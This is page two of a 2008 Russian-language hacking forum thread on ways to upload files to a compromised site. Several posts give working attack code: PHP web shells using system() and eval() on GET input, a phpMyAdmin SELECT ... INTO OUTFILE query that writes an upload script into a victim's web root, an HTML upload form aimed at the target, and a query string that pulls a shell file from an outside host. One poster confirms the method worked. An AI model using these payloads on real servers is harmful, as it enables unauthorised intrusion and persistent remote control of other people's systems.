ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Способы заливки файлов
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 31.07.2008, 19:40
UpsPig
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488

Репутация: 2
По умолчанию
n0ne
Если я правильно понял скрипт должен лежать на стороне жертвы.
Записать что то на черв можно только через shell.php <? system($_GET['cmd']); ?>, который я записал через phpmyadmin из-за того, что нельзя инклудить
 

  #12  
Старый 31.07.2008, 19:56
apollо
Новичок
Регистрация: 24.12.2006
Сообщений: 2
Провел на форуме:
18610

Репутация: 14
По умолчанию
Цитата:
Сообщение от UpsPig  
n0ne
Если я правильно понял скрипт должен лежать на стороне жертвы.
Записать что то на черв можно только через shell.php <? system($_GET['cmd']); ?>, который я записал через phpmyadmin из-за того, что нельзя инклудить
Если шел получил через phpmyadmin, то попробуй залить тогда так:

сначала сделай запрос в phpmyadmin:

SELECT '<? move_uploaded_file($userfile, "C:/путь_до_www/name_shell.php"); ?>' into OUTFILE "C:/путь_до_www/uploadshell.php"

///// думаю понятно, что создасться файл uploadshell.php в директории www, который впоследствии и зальёт нам шел под именем name_shell.php


Далее создай простую форму примерно следующего содержания:

PHP код:
<FORM ENCTYPE="multipart/form-data" ACTION="http://site_hack/uploadshell.php"     METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Агаотправить вот этот файлик: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM
подправь только ACTION и всё....

Желаю удачи
 

  #13  
Старый 31.07.2008, 20:42
UpsPig
Новичок
Регистрация: 22.06.2008
Сообщений: 22
Провел на форуме:
77488

Репутация: 2
По умолчанию
apollо
Зашибись сработало ))
 

  #14  
Старый 01.08.2008, 04:00
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
попробуй через phpmyadmin всунуть вот это <?php eval($_GET[cmd]);?> в файл test.php
затем

test.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php

ой)ты уже и так справился!"
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ